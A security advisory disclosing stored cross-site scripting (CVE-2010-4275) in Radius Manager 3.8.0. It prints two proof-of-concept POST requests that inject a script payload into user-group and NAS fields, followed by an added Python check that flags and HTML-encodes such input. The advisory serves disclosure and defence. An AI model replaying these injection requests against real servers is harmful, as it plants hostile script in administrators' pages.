Check Point Software Technologies - Vulnerability Discovery Team (VDT)
http://www.checkpoint.com/defense/

Radius Manager Multiple Cross Site Scripting Issues
CVE-2010-4275

INTRODUCTION

Radius Manager is a centralized administration tool for Mikrotik, Cisco, Chillispot and StarOS routers
and wireless access points. It has a centralized accounting system that uses Radius, providing easy user
and accounting management for ISPs.

This problem was confirmed in the following versions of Radius Manager; other versions may also be affected.

Radius Manager 3.8.0

CVSS Scoring System

The CVSS score is: 6.4
Base Score: 6.7
Temporal Score: 6.4
We used the following values to calculate the scores:
Base score is: AV:N/AC:L/Au:N/C:C/I:C/A:N
Temporal score is: E:F/RL:U/RC:C

DETAILS

The Radius Manager system is affected by multiple stored cross-site scripting issues. The “Group Name” and
“Description” fields in the “new_usergroup” menu do not sanitize input data, allowing an attacker to store
malicious JavaScript code in a page.

The same thing occurs with the “new_nas” menu.

Request:
http://<server>/admin.php?cont=update_usergroup&id=1

POST /admin.php?cont=update_usergroup&id=1 HTTP/1.1
Host: <server>
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; en-US; rv:1.9.2.10) Gecko/20100914 Firefox/3.6.10
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://<server>/admin.php?cont=edit_usergroup&id=1
Cookie: PHPSESSID=fo1ba9oci06jjsqkqpvptftj43; login_admin=admin; online_ordercol=username; online_ordertype=ASC; listusers_ordercol=username; listusers_ordertype=DESC; listusers_lastorder=username
Content-Type: application/x-www-form-urlencoded
Content-Length: 120

name=%3Cscript%3Ealert%28%27xss%27%29%3C%2Fscript%3E&descr=%3Cscript%3Ealert%28%27xss%27%29%3C%2Fscript%3E&Submit=Update

Request 2:
http://<server>/admin.php?cont=store_nas

POST /admin.php?cont=store_nas HTTP/1.1
Host: <server>
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; en-US; rv:1.9.2.10) Gecko/20100914 Firefox/3.6.10
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://<server>/admin.php?cont=new_nas
Cookie: PHPSESSID=fo1ba9oci06jjsqkqpvptftj43; login_admin=admin; online_ordercol=username; online_ordertype=ASC; listusers_ordercol=username; listusers_ordertype=DESC; listusers_lastorder=username
Content-Type: application/x-www-form-urlencoded
Content-Length: 112

name=Name&nasip=10.0.0.1&type=0&secret=1111&descr=%3Cscript%3Ealert%28%27xss%27%29%3C%2Fscript%3E&Submit=Add+NAS

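Added example (not part of the original advisory, and not Radius Manager code): a Python check that decodes
the two form bodies shown above, flags markup in the free-text fields, and shows the same values HTML-encoded
for output. The function names, the field map and the benign sample are assumptions made for illustration.

```python
import html
import re
from urllib.parse import parse_qs, urlsplit

# Free-text fields per admin.php "cont" action, taken from the advisory's two requests.
# Assumption: "name" is also checked for store_nas; the advisory only shows "descr" there.
FREE_TEXT_FIELDS = {
    "update_usergroup": ("name", "descr"),
    "store_nas": ("name", "descr"),
}

# Angle brackets are enough to open a tag when the value is echoed unencoded.
TAG_CHARS = re.compile(r"[<>]")


def flag_fields(request_target, body):
    """Return [(field, decoded value)] for free-text fields that contain markup."""
    action = parse_qs(urlsplit(request_target).query).get("cont", [""])[0]
    form = parse_qs(body, keep_blank_values=True)  # also undoes %XX and '+'
    return [
        (field, value)
        for field in FREE_TEXT_FIELDS.get(action, ())
        for value in form.get(field, [])
        if TAG_CHARS.search(value)
    ]


def render_cell(value):
    """Encode a stored value for HTML output; quotes are covered for attribute use."""
    return "<td>" + html.escape(value, quote=True) + "</td>"


# Constructed samples: the two request bodies from the advisory and one benign edit.
PAYLOAD = "%3Cscript%3Ealert%28%27xss%27%29%3C%2Fscript%3E"
SAMPLES = [
    ("/admin.php?cont=update_usergroup&id=1", f"name={PAYLOAD}&descr={PAYLOAD}&Submit=Update"),
    ("/admin.php?cont=store_nas", f"name=Name&nasip=10.0.0.1&type=0&secret=1111&descr={PAYLOAD}&Submit=Add+NAS"),
    ("/admin.php?cont=update_usergroup&id=1", "name=Gold+plan&descr=10+Mbit&Submit=Update"),
]

if __name__ == "__main__":
    for target, body in SAMPLES:
        for field, value in flag_fields(target, body):
            print(f"{target}: {field} carries markup -> rendered as {render_cell(value)}")
```

Encoding at output time is what neutralises the stored value; the request-side flag is only a way to find records and requests that need review.
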
CREDITS

This vulnerability was brought to our attention by Ulisses Castro of the Conviso IT Security company
(http://www.conviso.com.br) and researched internally by Rodrigo Rubira Branco of the Check Point
Vulnerability Discovery Team (VDT).

Rodrigo Rubira Branco
Senior Security Researcher
Vulnerability Discovery Team (VDT)
Check Point Software Technologies
http://www.checkpoint.com/defense